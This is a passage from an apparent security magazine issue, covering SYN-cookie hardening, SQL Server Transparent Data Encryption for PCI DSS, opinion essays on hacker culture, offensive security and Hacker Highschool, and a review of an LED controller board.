connections in SYN-RECEIVED. Here states are normally kept in the sequence number sent on the SYN-ACK. A legitimate request can thus only can do a handshake where bogus requests will fail because of the state in the TCB. If the client sends a subsequent ACK response, the server can reconstruct the SYN queue using details programmed in the TCP sequence. The tcp_syncookies can be enabled in the following manner: 78 NeXpose and Metasploit Pro Hacking Table 3. SYN Cookies setting in /etc/sysctl.conf Step 1 2 3 Activity Edit the file /etc/sysctl.conf Append the following Save the changes Output vi /etc/sysctl.conf net.ipv4.tcp_syncookies = 1 sysctl -p Other approaches There can be other approaches as well to contain SYN Floods. These can be: • New Generation Firewall & Proxy Servers • Recycling of the oldest Half Open TCBs • Dynamic & adaptive threshold tuning and profiling • Exception Recording, etc. References • • • • • • http://www.ietf.org/rfc/rfc4987.txt http://linux.die.net/man/8/hping3 http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-4/syn_flooding_attacks.html https://www.ietf.org/rfc/rfc2827.txt http://www.ietf.org/rfc/rfc3704.txt request_sock.c by Arnaldo Carvalho de Melo About the Author Ratan Jyoti is currently working as a Chief Manager (Information Security) at a leading Indian Bank. He has more than 12 years experience in IT and Information Security in Banking Industry. He is a Certified Information Systems Security Professional, Certified Information Systems Auditor and a Certified Ethical hacker. His major areas of expertise include Information Security Governance, Information Risk Management, IS Audit, Cyber forensics, Information Security Management System and Compliance. He is a regular contributor to reputed International Journals and Magazines in the area of Information Security. 79 NeXpose and Metasploit Pro Hacking IMPLEMENTATION OF TRANSPARENT DATA ENCRYPTION (TDE) AND ADDITIONAL COMPENSATIONAL CONTROLS AS ALTERNATIVE METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT SQL DATABASE (PCI DSS V3.0, SECTION 3.4) by Darko Mihajlovski, Kiril Buhov, Jani Nikolov “Proper” TDE implementation should cover the 3.4 requirement from PCIDSS v3, where it demands the following: Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches: • One-way hashes based on strong cryptography (hash must be of the entire PAN) • Truncation (hashing cannot be used to replace the truncated segment of PAN) • Index tokens and pads (pads must be securely stored) • Strong cryptography with associated key-management processes and procedures It has come to Visa’s attention that certain assessors and merchants require clarification about the intent of 3.4 PCI DSS requirements. PCI Requirement 3.4 states: Render sensitive cardholder data unreadable anywhere it is stored (including data on portable media, in logs and data received from or stored by wireless networks) by using any of the following approaches: • One-way hashes (hashed indexes) such as SHA -1 • Truncation • Index tokens and PADs, with the PADs being securely stored • Strong cryptography, such as Triple-DES 128-bit or AES 256-bit with associated key management processes and procedures. The MINIMUM account information that needs to be rendered unreadable is the payment card account number. The use of encryption to render cardholder data unreadable is a highly effective and readily accepted way to secure data. For companies that are unable to employ sufficient encryption solutions due to technical constraints, compensating controls may be considered. Only companies that have undertaken a risk analysis and have legitimate technological or business constraints will be considered for use of compensating controls to achieve compliance. Compensating controls must provide additional protection to mitigate any additional risk posed by the unencrypted data. Compensating controls considered must be in addition to controls required in the PCI DSS. It is not a compensating control to simply be in compliance with other PCI requirements. Encryption, while a desirable approach, is not the only approach to meeting PCI 3.4. The problem occurs when the System/Application/Software Vendor tells you that encrypting the PANs is not a possible option. 80 NeXpose and Metasploit Pro Hacking PCI AND THE ART OF THE COMPENSATING CONTROL Compensating controls are a standard part of any security posture. But what makes an effective compensating control? In the early years of the Payment Card Industry Data Security Standard (PCI DSS), and even one author’s experience under the CISP program, the term compensating control was used to describe everything from a legitimate work-around for a security challenge to a shortcut to compliance. If you are considering a compensating control, you must perform a risk analysis and have a legitimate technological or documented business constraint before you even go to the next step. Companies being assessed will present more documented business constraints for review based on the current economic situation. Every compensating control must meet four criteria before it can be considered for validity. The four items that every compensating control must do are: meet the intent and rigor of the original PCI DSS requirement, provide a similar level of defense as the original PCI DSS requirement, be “above and beyond” other PCI DSS requirements, and be commensurate with the additional risk imposed by not adhering to the PCI DSS requirement. An example of a valid control might be using extra logs for the su command in UNIX to track actions executed under a shared root password. In rare cases, a system may not be able to use something like sudo to prevent shared administrator passwords from being used. Keep in mind, this is not a license to use shared passwords everywhere in your environment. Nearly every system has the ability to use something like sudo, or “Run As” which is free or built into your OS, or a commercial variant if your platform requires this. WHERE ARE COMPENSATING CONTROLS IN PCI DSS? Compensating controls are not specifically defined inside PCI, but are instead defined by you (as a self certifying merchant) or your QSA. That’s where the trouble starts. Thankfully, the PCI Council provides an example of a completed compensating control in Appendix C of the PCI DSS, as well as a blank template to fill out. Appendix B provides all the guidance they feel necessary in order to design a compensating control. Compensating controls are ultimately accepted by acquirers or the card brands themselves (if applicable), so even after putting all of this information together you could face the rejection of your control and a significant amount of expense re-architecting your process to fit the original control. This is where an experienced QSA can really help you ensure your control passes the “Sniff Test.” If it smells like a valid control, it probably will pass. If you need examples, look later in this chapter under the section titled “Funny Controls You Didn’t Design.” WHAT A COMPENSATING CONTROL IS NOT Compensating controls are not a short cut to compliance. In reality, most compensating controls are actually harder to do and cost more money in the long run than actually fixing or addressing the original issue or vulnerability. Imagine walking into a meeting with a customer that has an open, flat network, with no encryption anywhere to be found (including on their wireless network which is not segmented either). Keep in mind, network segmentation is not required by PCI, but it does make compliance easier. Usually in this situation, assessors may find a legacy system that cannot be patched or upgraded, but now becomes in scope. Then the conversation about compensating controls starts. Now imagine someone in internal assessing telling you not to worry because they would just get some compensating controls. Finally, imagine they tell you this in the same voice and tone as if they were going down to the local drug store to pick up a case of compensating controls on aisle five. 81 NeXpose and Metasploit Pro Hacking Compensating controls were never meant to be a permanent solution for a compliance gap. Encryption requirements on large systems were made unreasonable early in this decade. Not only was there limited availability of commercial off-the-shelf software, but it was prohibitively expensive to implement. For Requirement 3.4 (Render PAN, at minimum, unreadable anywhere it is stored), card brands (largely Visa at the time) were quick to point out that compensating controls could be implemented for this requirement; one of those being strong access controls on large systems. For mainframes, assessors would typically do a cursory walk through the controls and continue to recommend an encryption solution at some point for those systems. At one point, compensating controls were deemed to have a lifespan; meaning that the lack of encryption on a mainframe would only be accepted for a certain period of time. After that, companies would need to put encryption strategies in place. Compensating control life spans never materialized. Compensating controls can be used for nearly every single requirement in the DSS--the most notable exception being permissible storage of sensitive authentication data after authorization. There are many requirements that commonly show up on compensating control worksheets; Requirement 3.4 being one of them. To clarify: it is up to the QSA performing the assessment to decide to accept the control initially, but the Acquiring Bank (for merchants) has the final say. Substantial documentation and an open channel of communication to your acquirer is essential to ensure money is not wasted putting together controls that ultimately do not pass muster. Still, compensating controls are still a viable path to compliance even considering the above caveats and descriptions of why you may not want to use them. HOW TO CREATE GOOD COMPENSATING CONTROL We’ve spent quite a bit of time setting this section up. We talked about what Compensating Controls are, what they are not, and some of the best mis-guided attempts to create them. Before we discuss the examples, please remember that these examples should be used for illustrative purposes only. I have over simplified the scenarios for brevity, and things are rarely this simple in the corporate world. Ultimately, compensating controls must be approved first by a QSA, or barring that, your Acquiring Bank. I know I don’t like it when someone brings an article about PCI to an interview during an assessment, so please don’t do that with this one. Now let’s walk through a couple of examples of how one might create a good compensating control. Here’s a common compensating control that QSAs will define and implement at a customer. A Level 1 brick and mortar retailer with 2,500 stores has some systems in their stores that do not process cardholder data. These systems are a high risk to this customer’s cardholder environment because they may access both the internet through a local firewall and the corporate intranet and webmail system, and users log-in to that machine with the default administrator account. Store managers and retail operations claim that the systems are required for day-to-day business because each store is empowered to customize their operations to better fit the local market. The corporation believes this drives innovation and helps them maintain a competitive edge over their peers. If the retailer chooses not to segment the network, all of the systems in the store are now in scope, and they must meet all of the applicable requirements of the PCI DSS. Doing this will add significant expense to the IT infrastructure, and will probably force a call center to be staffed up in order to manage the volume of calls that will come in for things like password maintenance. What do you do? Do you crush the retailers’ aspirations to innovate by telling them they must deploy active directory to these machines, lock them down Department of Defense tight, and staff a call center? That is one option. But, if you made that recommendation you missed something important--understanding the business and limiting the impact that your compliance recommendations make. Instead, consider this compensating control. Any number of network components could be used to create some segmentation in this environment. Let’s say that we have a VLAN (Virtual Local Area Network) aware switch at the location that can have 82 NeXpose and Metasploit Pro Hacking access lists (ACLs) tied to it. Why not create a new VLAN for just the POS network? Then create some ACLs around it to make it look like it is segmented behind a firewall. Now the threat of the in-store PC is effectively mitigated provided that the ACLs are appropriately secure. “But my store networks are different in every store,” you say. “I can’t just slap something in there like that and expect it to work globally!” If this is the case, is your store support group overloaded with break-fix calls? Maybe this could be an opportunity to shore this up and base each store’s network on a consistent footprint? APPROACH TO THE PROBLEM SQL Server has advanced over the years to become a very popular, capable database, evolving from a primarily departmental and SMB database to a fully enterprise capable platform. SQL Server’s appeals are many, from its highly scalable and secure database engine to its built in reporting and data analysis tools. SQL Server 2008 offers new features of particular interest to PCI DSS compliance including: • Full Database Encryption through Transparent Data Encryption (TDE) • Split Key Ownership through Extensible Key Management (EKM) • Granular Auditing Capabilities through SQL Server Audit and Change Data Capture • Continued support of Signed Module • Built-in Control over Default SQL Server 2008 Features • Stronger Control and Auditability overServer and Database Configuration through Policy-Based Management Implementation of the PCI DSS controls through SQL Server 2008 technology allows for the ability to standardize and computerize security controls effectively and efficiently, particularly when applied during the installation process. SQL SERVER 2008 TRANSPARENT DATA ENCRYPTION OFFERS FULL DATA ENCRYPTION “Transparent data encryption(TDE) performs real-time I/O encryption and decryption of the data and log files. The encryption uses a database encryption key (DEK), which is stored in the database boot record for availability during recovery. The DEK is a symmetric key secured by using a certificate stored in the master database of the server or an asymmetric key protected by an EKM module. TDE protects data “at rest”, meaning the data and log files. It provides the ability to comply with many laws, regulations, and guidelines established in various industries. This enables software developers to encrypt data by using AES and 3DES encryption algorithms without changing existing applications.” When choosing to enable TDE in your environment there are a number of factors to consider during the implementation. First, TDE only secures data at rest and does not help to secure the communication (such as during remote ODBC queries) of the data. Second, the certificate used to encrypt the data is required during any attempt to decrypt the data. Third, complete and accurate backups of the certificate are required to minimize the risk of data loss. Backups of the database itself will be encrypted and will require the certificate as well. 83 NeXpose and Metasploit Pro Hacking USING MANUAL KEY MANAGEMENT If you are using manual key management several steps will be required. You will need to create a database master key in the master database (be sure to use a strong password to protect the key). The database master key you have created will be used to protect the TDE certificate. You are now ready to backup the master database master key to a removable disk and store in a safe location. At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to backup the certificate to a removable disk and store in a safe location. Only users who need access to cardholder data should be given permissions to any keys and certificates used to decrypt sensitive data. As noted above, encryption keys may be managed manually or through an encryption key management software package in SQL Server 2008. In the case of SQL Server, the TDE Database Encryption Key must be replaced at least once per year. You will need to generate or load a new certificate or asymmetric key, backup the certificate, and re-encrypt the Database Encryption Key using the new certificate. It is important to make sure to keep backups of prior certificates as those will be required to restore copies of the database made when those certificates were active. Keep in mind this is also required when using EKM generated asymmetric keys; however, the EKM provider should have features for managing this. First, any user that can backup keys and certificates should have write access to the backup folder location, but be denied read access to that location. Second, users with access to the key and certificate backup folders should be denied access to any backups of the database. To make certain that this is the case, the user who backs up the database should not be the same user who backs up the certificates. At a high level, if an organization is using manual key management, the key must be stored utilizing tamper evident media, or in a tamper evident container. In some instances something as simple as a pressure-sealed envelope may suffice. The keys must also be placed under dual control. An example of dual control might be a key file an organization has placed in “lockbox” inside of a safe. The key to the lockbox and key to the safe would be given to separate individuals. Thus two people are required to act in concert to recover the key. Lastly, any plaintext instances of cryptographic keys must be under split knowledge. Split knowledge requires that no single individual has access to the entire plaintext key. Using our “lockbox in a safe” example, split knowledge might require that the actual key is stored in two “halves”, and potentially in separate lockboxes inside the safety deposit box. Looking at what this means for SQL Server when using manual key management first create a database master key in the master database. Be sure to use a strong password to protect the key, with parts of the password entered by two individuals. The database master key you have created will be used to protect the TDE certificate. You are now ready to backup the master database master key and/or the TDE certificate to a removable media. Be certain to store it in a safe location, and employ secure storage mechanisms meeting the requirements of tamper evident, dual knowledge, and split control referenced above. At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to backup the certificate to a removable media and store securely. When using manual key management, careful consideration must be given to access to the data encrypting keys and key encrypting keys so that your organization can achieve proper implementation of split knowledge. For example, it may be required to have two individuals present to enter portions of the password assigned to the backup certificates. A similar requirement may exist for access to service accounts which can access the keys. Remember to carefully consider which users or service accounts that have sufficient access to the database bootfile, as that will be the “key to the kingdom”. Also, it should be mentioned that in the environment it should be fulfilled the following: • SA disabled when using Windows auth. Mode • BUILTIN/Administrators group not a member of sysadmin role 84 NeXpose and Metasploit Pro Hacking • Use of signed modules • Role based access • Hard segregation of duties, with matrixes of segregations, evidences and etc. • Hardening of the Database configuration, as reference - Compliance with the Microsoft SQL 2008 Server Hardening Guide, Version 1.0.0, 19 May 2011 References [1]Elaine Barker, William Barker, William Burr, William Polk, and Miles Smid, NIST Special Publication 800-57, Recommendation for Key Management – Part 1: General (Revision 3), (2012) [2]K. Brian Kelley, Kevvie Fowler, Nancy Hidy-Wilson, CIS Microsoft SQL Server 2012 Database Engine Benchmark v1.0.0, Release Date: Mon Jan 6 12:10:34 2014 [3idera, SQL Server Whitepapper, Security and Compliance Solutions for Payment Card Industry (PCI) Data Security Standard (DSS), [4]https://msdn.microsoft.com/en-us/library/bb934049.aspx [5]http://msdn.microsoft.com/en-us/library/ms190730%28v=SQL.100%29.aspx About the Authors Darko Mihajlovski MSc EE, C|EH, Certified Lead ISO27001:2013 Auditor. Has been working as a Chief Information Security Officer in a large company for the past six years and is also involved in information security projects, intended primarily for improving IS management in other companies, as an Information Security Professional. He is an ISMS expert in the field of implementing ISO27001:2005, PCI DSS 2.0, experienced in Auditing Information Systems, Incident Management, Analyze Audit Trail; and Penetration Testing. Head of Information Security Department, Halkbank AD Skopje, [email protected]. Kiril Buhov MSc PM. Head of Information Systems and Technical Support Department, Halkbank AD Skopje, [email protected]. Jani Nikolov MSc.B. Head of Card Processing and Alternative Channels Department, Halkbank AD Skopje, [email protected]. 85 NeXpose and Metasploit Pro Hacking Hacking Journalists by Bob Monroe There was a time when a reporter was called a hack. This term referred to their ability to hack away on a typewriter to create a story on a short deadline. Somewhere in the 1950’s, MIT’s Railroad Club adopted the term when they saw a cool use of technology. Railroads help to build the world and spread commerce across the globe. This was a proud term, a name for an action that you could be pleased to have been associated with. Then, somewhere that hack name started to be used for criminal internet activity. Today, a hacker is someone to be put in jail just for being called that nasty name. Security vendors use slogans like “Stop Hackers in their Tracks” and “Fight Hackers Where They Attack”. Okay, maybe these are termite pest control slogans but the meaning is the same: hackers are bad people, according to the press. The problem is that hackers aren’t bad people. Bad people are bad people. There is a huge difference between a hacker and a criminal. Some hacks actually save lives. Here is a nice hack for you: There is a microcontroller board called the TouchBoard made by Bare Conductive. I bought two of them when Radio Shack starting selling off their inventory around here. Each board cost me $10. Basically the board is a sensor controller. The device has twelve touch sensors that connect to a processor and the operating system is stored on a microSD card. When powered up with head phones or speakers attached, if you touch one of the sensors, a song is played from the storage card. You can change out the songs just by renaming and copying your songs over the ones on the tiny media card. If you press one sensor you get some jazz music. You touch another and you get some Frank Sinatra. A third sensor plays a symphony. You get the idea. Twelve sensors, twelve outputs. But with this board, there are two other output modes on the circuits. How can we hack this? Let’s say you live in a home where you’ve installed this $10 board to act as a sensor controller. When you step into your home, an IR detector senses your presence and activates the first touch sensor. This sensor is wired to your air conditioning unit. It is preset to turn onto 22 degree Celsius when activated. Walking in the front door activates this first environmental device. The second sensor is already activated because it is wired to a light sensor outside your house. It just detects whether it is light or dark outside. Since you work long hours, you often come home late to a dark house. Since this sensor is already activated, when you walk in the front door, that switch is tripped and lights turn on to illuminate your hallway. So we have two sensors working now. Let’s look at the third sensor on the twelve sensor device. This third sensor is wired to your media player. You like to come home to some music. When you enter your front door the third sensor is activated and your media player is already programmed to play some nice heavy metal or Danish folk songs, your choice. Right there we’ve turned a $10 MP3 player into a home automation platform, or a smarthome as the media would call it. Now, let’s take this same hack to another level – that’s what hackers do, we try new things with existing technology. Around where I live, we have a problem with cars running red lights. As a hacker, I never want to see anyone hurt so I want to come up with an easy solution to stop this reckless problem. I install the same $10 TouchBoard in the traffic light management system located near the sidewalk. Next, we set up an inexpensive IR beam by the traffic light that shines down at an angle onto the pavement below. A beam like this would cost around $3 at Radio Shack. Next to the beam we install a Passive Infrared Detector (PID) which also costs a whole $11 at Radio Shack. 86 NeXpose and Metasploit Pro Hacking The IR beam hits the pavement and is reflected back to the PID. IR is great at detecting heat and motion, like an on/off switch but with precision. Next, we set up a small algorithm that can determine the speed of an approaching vehicle. When a vehicle enters the beam field as the traffic light begins to turn from green to yellow, a calculation is made to determine the speed of that approaching traffic. We can easily figure out whether that incoming car will be able to stop in time to meet the coming red light. If that vehicle is moving too fast to safety brake for the red light, it’s simple human nature that the driver will run the red light. We have the statistics to back those numbers up. When that speeding traffic is sensed and determined that it will not be able to safety stop at that red light, then the first TouchBoard sensor is activated. This activation tells the traffic control box to turn all traffic lights red and keep them all red for three to four seconds. We don’t want any other traffic to move into the intersection so all lights remain red. As the red-light runner enters the middle of the intersection, there is another IR and PID sensor attached to a camera that takes a lovely picture of the license plate, with the red glow of the light. That nice picture is sent via email to the local traffic enforcement agency who will send that driver a wonderful letter in the mail along with a fine. That is the second sensor on the TouchBoard being activated. On the far end of the intersection, there is a third set of IR and PID sensors. These determine that the offending vehicle has left the danger area of the intersection. This trips the third TouchBoard sensor which plays some jazz music and tells the traffic management system to reset the system and return to normal operations. With a simple $10 TouchBoard, we’ve played some music, automated your house and saved a couple of lives. All by just doing some simple hacks. Please, the next time you are persuaded to think of hackers as criminals, remember that even hackers like Danish Folks songs. Or something like that. Hack and don’t talk smack. About the Author Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers. 87 NeXpose and Metasploit Pro Hacking Offended by Offensive Security by Bob Monroe The commonly held belief in the realm of digital security (cyber security for the new folks and media) is that the methods employed are strictly defensive in nature. Networks prepare for and wait for an attack, defend against the attack, respond as needed and maybe even report the attack to the authorities. If the attack was successful and not detected, the authorities contact the network in a reverse fashion. This process repeats itself thousands of times a day across the world. Rates of actual convictions for computer crimes range from 89%1 for small countries to 5% for larger ones2. This does not reflect the actual number of people accused of committing such crimes, only the total number of people charged for such crimes that are convicted in a court. IMB’s Xforce Threat Activity Exchange3 shows current malicious activity across all monitored and reported IP addresses across the globe. At any given moment, there are hundreds of attacks represented on the exchange in a lovely colored chart of the world. There is nothing new to this information, just a different way to express it. Defensive posturing is the art of fortifying assets with multiple types of protection. In the physical world, there are walls, barbed wire, security guards with vicious attack dogs, doors, walled doors with vicious attack dogs and so forth. The digital world has firewalls, intrusion detection systems, packet sniffers, access controls, and authentication methods, but sadly no vicious attack dogs. Networks combine these physical and digital products in a constant game of trying to protect their assets. We already know how well that is working out for them. Target, Sony, Coca Cola, Starbucks and all the banks out there have been in the headlines for being attacked. Law enforcement expects organizations and people to perform due diligence on protecting their assets. Leaving your valuable jewelry out in the open in public will be frowned upon by the police detective who has to write that theft report. Likewise, not changing the default password on a network switch or VMware server will also cause dismay from the shareholders as they pay out law suits for loss of data. Due diligence is much like the cave people huddled around a fire during the dark of night. They expect the fire (law enforcement) to protect them from the vicious attack of carnivores as they circle around the flames. As the evening wears on, the flames must be stoked and maintained, which means somebody has to go get more firewood. Those who go to get that firewood may not come back because they’ve ended up a meal for something else. This means the fire is limited in scope and resources. Law enforcement can only do so much with what they have. As the animals see the fire wane, they approach closer and begin picking off one cave person at a time. If one of the animals catches fire, the cave people at least get a buffet for their efforts. This is little comfort since each night this same routine repeats itself. The fire is only a single tool and cannot be expected to protect everyone against all hungry animals out there. We must look at another method. Offensive security has had a bad reputation for many years. It is considered vigilantism by some. Others will say that you are taking the law into your own hands. There are political and legal issues with reprisal against the wrong parties, if you counter attack. The arguments are endless, yet nothing really seems to change the cyber security environment except more high profile attacks. Argue all you want, changes only happen when someone is willing to make those changes. Paul Asadoorian and John Strand offered a solution at the 2012 RSA convention4. Their approach was to suggest three phases of annoyance, attribution and attack to ward off malicious intruders. Using the same tools as penetration testers use, these could be employed to become offensive weapons, the presenters acknowledged. They also suggested tagging data and documents with web bugs to activate whenever that 88 NeXpose and Metasploit Pro Hacking asset was used outside the intended environment. This is similar to the ink bombs used on department store merchandise that explode if the garment leaves the perimeter. This is also very much like the ink packets used in banks that stain money stolen during a heist. Is that offensive security or just good advice? Both. There has never been a battle in the history of war won by waiting for the enemy to attack first. If you happen to wait for the enemy, then it is called an ambush and you have the upper hand due to the element of surprise and firepower. No military commander has ever told their troops to sit and wait for the enemy to strike first. There is no tactical advantage to such a strategy but security professionals are expected to do this exact same thing each and every day. We wait and then respond. We add more kindling to the fire, hoping we don’t get eaten next. It’s a little like watching a horror movie. You know that the victim shouldn’t go down into the basement alone but they do anyways. Doesn’t the sound of a chain saw and screams give the victim the slightest hint that bad things are happening in the basement? But there they go, armed with a faulty flashlight and no cell phone signal, to their doom, over and over again. Forgive the bluntness but this is stupid. Defensive security is no way to go through life. We tell our kids not to be victims of bullies, we tell them to stand up to school thugs. We don’t practice what we preach, though. Even police departments in the U.S. have paid ransoms to get their data back from ransomware thieves. The fire itself has gotten burned. At what point are you going to stop playing the game where you don’t even know the rules? Penetration testing is not the same as an attack. A penetration test has a scope with limitations and boundaries. An attack has a goal and no time limit. In order to conduct a proper security test, you must use the Open Source Security Testing Methodology Manual (OSSTMM). If you want to prove trust in your network, you have to have a scientific and mathematically proven method instead of just some cool software. Stop waiting for the bad man to go away. He isn’t going to leave. Start conducting proper security testing and become active in your role as a security professional. Grab the OSSTMM and start pursuing the animals eating all your friends. That fire is not getting any bigger. 1 http://saitnews.co.za/e-government/cybercrime-conviction/ 2http://www.oneindia.com/feature/conviction-rate-cyber-crime-is-0-5-per-cent-here-are-the-reasons-1609728.html 3 https://exchange.xforce.ibmcloud.com/ 4http://whatis.techtarget.com/definition/offensive-security About the Author Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers. 89 NeXpose and Metasploit Pro Hacking Shouting at the Security Waves by Bob Monroe At the RSA convention in April, I met a wonderful European gentleman named Knud. The ‘K’ is pronounced for this name. Knud told me the story of a Viking king who was known for shouting at the waves. According to several documented accounts, this king would make it his mission to order the waves to cease at his command. The Viking lord was spotted many times standing on top of a cliff yelling at the waves below to stop. For what purpose, we will never know. We do know that the waves did not stop and have not stopped for any man beyond religious accounts. No mortal man has ever been able to command the ocean to bend to their will. But that would be a cool trick to witness. The biggest question here is why a noble man would even try to stop these forces of nature. Because he thought he could? Because he thought he had some magical power? Because he was trying to prove a point, maybe? In digital security, we often find ourselves trying to shout at the waves as well. We go to training, attend classes, buy new software, add all sorts of cool gadgets, in hopes that we, too, can control the waves of security woes. This is not just an uphill battle; it’s a battle you can’t win with the way things are going now. No, this article isn’t about FUD. It’s about the reality of futility. RSA had an estimated 35,000 attendees last week. Of those thousands, I only saw a few African Americans. I saw a small percentage of women make up the crowd. Except in one case, I did not see a single teenager. Why is that? The last time I looked, there was a significant part of our population that isn’t white and male. So why is digital security dominated by old white guys when the real world doesn’t look anything like that? Amit Yoran of RSA had a talk about the need for a new map in the field of cyber security. How about we start by populating that map with a better representation of the real world? We can add some minorities to the workforce. We can increase the amount for women in this profession. Maybe even give them equal pay for equal work. While Mr. Yoran has you sitting in the dark1 when it comes to security, we at the Institute for Security and Open Methodology have created a free teaching platform for teens. If we want a new shift in thinking, if we want the waves to actually stop, we need to come up with a new solution. At Hacker Highschool2, we have a new solution and it’s called free education. There are all kinds of lessons for teens to download that will teach them about the digital security profession. These lessons are free to download and are translated into twenty-two languages. The lessons do not teach any particular product or vendor, we teach our students to think for themselves. The lessons do not endorse sitting in the dark, waiting for an opportunity. Instead we teach something called trust. Trust is established by implementing the ten operational security controls listed in the Open Source Security Testing Methodology Manual (OSSTMM). This is an unbiased evaluation of any device, network, or product down to the chip level. You, the evaluator, get to determine whether something is trustworthy or not. The vendor marketing terms and fancy words fall to the side when you use the free OSSTMM. This is what we are teaching at Hacker Highschool. We are teaching the next generation of digital security professionals to question every firewall, every protocol, every chip on every device and every means of communication to see if they are trustworthy. The OSSTMM uses a simple mathematical formula to remove any doubt that could add opinion over fact. 1 http://www.rsaconference.com/blogs/rsas-amit-yoran-security-is-stumbling-around-in-the-dark?utm_source=inhouse&utm_medium=email&utm_campaign= april2015newsletter&spMailingID=22563241&spUserID=MTA3NDg3MTA1NjQ4S0&spJobID=543048202&spReportId=NTQzMDQ4MjAyS0 2 Hackerhighschool.org 90 NeXpose and Metasploit Pro Hacking Our lessons at Hacker Highschool are being taught at a rate of 6 million downloads. Of those downloads, only 2% are from the U.S... Why is that? Why is it that China understands the importance of teaching their youth about security but the U.S. does not? Europe and Asia also understand this critical shortfall but not in America. We don’t ask for your race, gender or financial background to download our free material. We just want you to learn. Hacker Highschool has the lessons, the teacher training material and the certifications backed by the Institute for Security and Open Methodology (ISECOM.org). We want you to stop shouting at the waves and shine some light into the darkness. The new map belongs to our future and we need to start teaching them about the mistakes we already made. For those who are asking who I am, I’m an unpaid volunteer for Hacker Highschool, as all of us are. We believe in this cause but we need your help. Help us to help you. Teach the next generation of teens about our field. Shine some light onto their faces and watch them learn. A little knowledge goes a long way. About the Author Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers. 91 NeXpose and Metasploit Pro Hacking RGB LED Lighting Shield with XMC1202 for Arduino Reviewed by Bob Monroe This little board is powered by a Cortex Arm M10 processor, which means it has programmable functions but sips power. Don’t confuse the M10 with Intel’s M core processors even though this processor runs on 32 bit at 32 MHz. This isn’t lightning fast, however, this board isn’t designed as a graphics card. It’s designed to be a programmable LED controller. To program the board and run it, you have to have an Arduino board or you can use Infineon’s own XMC1100 Boot Kit. The XMC1100 is native to the XMC1202, so they sit on top of each other. This is pretty much what all microcomputers do, they allow for boards to stack on top of each other, connected via GPIO, serial or other direct methods. There is speed in doing this since the boards are physically attached and share input and output. Since the XMC1202 has its own programmable processor, that processor can add to the microcomputer’s own computation power, almost like a GPU would. This frees up the main processor to focus on other tasks instead of having to compute graphics data. Think of it as having your own personal assistant. That assistant can pick up duties you don’t have time for. so it frees you up to do other things, like play with other add on boards and write cool code. The board is screaming red in color. It almost hurts your eyes to look at. Infineon and a few other companies have been doing this flaming color thing for one reason or another. I guess it helps you find the board if you ever misplace it. I’m talking ultra-bright red. The type of red that usually signals danger. Luckily, the board isn’t a danger, just really bright. I noticed quite a bit of empty space on the board; what I would consider to be wasted space because I like my boards to be packed with every sensor and gadget available. The XMC1202 does one thing but it does it well. It controls LEDs. This means you have an assortment of options with a programmable LED board. You are a little limited on the pin count, though, so make your connections count. If you are interested in controlling all of the lighting in your home or small office, this board is for you. If you want to set up a cool LED display that says what a great programmer are, this is the board for you. The XMC1202 can control up to three different LED channels at a time. This means you can configure a string of red LEDs to flash, while a strand of blue LEDs pulse and your green LEDs orbit in a loop. There, you have a nice Halloween costume or a funky outfit for your dog. I was a little surprised by the heat put off by the board during my testing. The buildup isn’t terrible but it would be something to take into consideration if your poor dog were wearing an outfit using this dev board. The LEDs don’t really put off any heat but they did make my dog look at me really funny when they started to flash. He tried to bite them. It was funny to see his mouth light up as the LEDs pulsed. The XMC1202 has some of the pin outs marked so you know what they do. It also helps that the red monster has connector holes to stack onto the other boards. There is about a ½ clearance that you will need to take into consideration where the wires are connected. I found this additional space useful to help move some of that excess heat away from the main board. The space uses plastic parts so you don’t need to worry about making extra sparks if the two boards touch. I’ve seen other 